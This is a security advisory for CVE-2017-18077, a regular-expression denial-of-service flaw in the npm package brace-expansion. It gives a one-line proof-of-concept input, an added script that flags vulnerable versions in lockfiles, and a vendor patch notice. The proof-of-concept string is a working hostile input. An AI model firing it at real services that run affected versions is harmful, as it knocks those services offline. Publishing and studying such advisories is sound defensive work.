CVE-2017-18077

ReDoS in brace-expansion

Description

Affected versions of brace-expansion are vulnerable to a regular expression denial of service condition.

Proof of Concept

var expand = require('brace-expansion');
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');

Recommendation

Update to version 1.1.7 or later.
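
One way to check a project against this recommendation, as an added example that is not code from the advisory or from the brace-expansion project: the script walks a parsed package-lock.json and lists every installed copy of brace-expansion older than 1.1.7. The function names and the two sample lockfiles are constructed for illustration.

```javascript
// Flag brace-expansion installs below the fixed version (1.1.7) named in the
// Recommendation, by walking a parsed package-lock.json. Added example.
const FIXED = [1, 1, 7];

// Compare "x.y.z" against FIXED numerically; prerelease/build suffixes are ignored.
function isBelowFixed(version) {
  const parts = String(version).split(/[-+]/)[0].split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    const a = parts[i] || 0;
    if (a !== FIXED[i]) return a < FIXED[i];
  }
  return false;
}

// Returns [{ path, version }] for every vulnerable copy in the lockfile.
function findVulnerable(lock) {
  const hits = [];
  if (lock.packages) {
    // lockfileVersion 2/3: flat map keyed by install path
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (/(^|\/)node_modules\/brace-expansion$/.test(path) && isBelowFixed(meta.version)) {
        hits.push({ path, version: meta.version });
      }
    }
    return hits;
  }
  // lockfileVersion 1: nested "dependencies" trees
  (function walk(deps, prefix) {
    for (const [name, meta] of Object.entries(deps || {})) {
      const path = `${prefix}node_modules/${name}`;
      if (name === 'brace-expansion' && isBelowFixed(meta.version)) {
        hits.push({ path, version: meta.version });
      }
      walk(meta.dependencies, `${path}/`);
    }
  })(lock.dependencies, '');
  return hits;
}

// Constructed sample lockfiles (not taken from any real project).
const sampleV3 = { lockfileVersion: 3, packages: {
  '': { name: 'demo' },
  'node_modules/brace-expansion': { version: '1.1.11' },
  'node_modules/old-glob/node_modules/brace-expansion': { version: '1.1.6' } } };
const sampleV1 = { lockfileVersion: 1, dependencies: {
  minimatch: { version: '3.0.3', dependencies: { 'brace-expansion': { version: '1.1.4' } } },
  'brace-expansion': { version: '2.0.1' } } };

console.log(findVulnerable(sampleV3), findVulnerable(sampleV1));
```

To scan a real project, pass `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))` to `findVulnerable`; nested copies pulled in by other packages are reported with their full install path.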

Patch Available

Fix available through Seal Security. No upgrade required, protect your application instantly.

Vulnerability Details

Score:
Score Vector:
Affected Versions:
Severity:
Ecosystem: JavaScript
Publish Date: January 29, 2018
Modified Date: November 7, 2023